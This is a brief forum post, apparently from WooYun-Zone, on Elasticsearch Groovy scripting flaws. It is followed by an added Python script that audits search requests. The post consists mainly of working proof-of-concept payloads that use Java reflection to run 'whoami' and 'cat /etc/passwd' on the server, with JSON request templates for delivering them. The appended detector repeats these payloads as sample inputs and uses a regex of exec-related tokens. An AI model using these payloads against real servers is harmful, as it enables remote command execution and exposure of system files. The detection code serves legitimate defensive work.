elasticsearch scripting security issues

Category: WooYun-Zone

elasticsearch scripting:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

security issues:

http://www.elasticsearch.org/community/security/

http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0

POC:

Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()
super.class.toString().valueOf('whoami').execute().getText()

http://zone.wooyun.org/content/18915

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

 

{
  "size": 1, 
  "query": {
    "function_score": {
      "script_score": {
        "script": "POC............",
        "lang": "groovy"
      }
    }
  }
}

 

{
    "size": 1, 
    "script_fields": {
        "my_field": {
            "script": "POC.........."
        }
    }
}
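
For defenders: an added example (not part of the original post) that audits search request bodies, for instance from a reverse-proxy log, for script values carrying the reflection and process-execution tokens the PoCs above rely on. The token list, function names and sample bodies are constructed for illustration, and the match is a heuristic.

```python
import json
import re

# Constructed heuristic: tokens that a legitimate scoring or field script
# rarely needs but that the reflection-based PoCs above depend on.
SUSPICIOUS = re.compile(
    r"\.class\b|forName\s*\(|getRuntime\s*\(|\.exec\s*\(|\.execute\s*\("
    r"|java\.(?:lang|io)\.|ProcessBuilder|newInstance\s*\("
)

def iter_scripts(node, path="", in_script=False):
    """Yield (json_path, text) for every string at or below a "script" key."""
    if isinstance(node, str):
        if in_script:
            yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            yield from iter_scripts(value, child, in_script or key == "script")
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from iter_scripts(item, f"{path}[{i}]", in_script)

def audit_search_body(raw):
    """Return findings (path + matched tokens) for one search request body."""
    try:
        body = json.loads(raw)
    except ValueError:
        return [{"path": "", "tokens": ["<unparseable body>"]}]
    findings = []
    for path, text in iter_scripts(body):
        tokens = sorted({m.group(0) for m in SUSPICIOUS.finditer(text)})
        if tokens:
            findings.append({"path": path, "tokens": tokens})
    return findings

# Constructed sample bodies in the two request shapes shown on this page.
SAMPLE_SCORE = json.dumps({"size": 1, "query": {"function_score": {"script_score": {
    "script": 'java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("whoami")',
    "lang": "groovy"}}}})
SAMPLE_FIELD = json.dumps({"size": 1, "script_fields": {"my_field": {
    "script": "super.class.toString().valueOf('whoami').execute().getText()"}}})
SAMPLE_BENIGN = json.dumps({"size": 1, "script_fields": {"total": {
    "script": "doc['price'].value * 2"}}})

if __name__ == "__main__":
    for name, raw in [("score", SAMPLE_SCORE), ("field", SAMPLE_FIELD), ("benign", SAMPLE_BENIGN)]:
        print(name, audit_search_body(raw))
```

A hit gives the JSON path of the script and the matched tokens, which is enough to triage a logged request; an empty list means no token matched, not that the script is safe.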
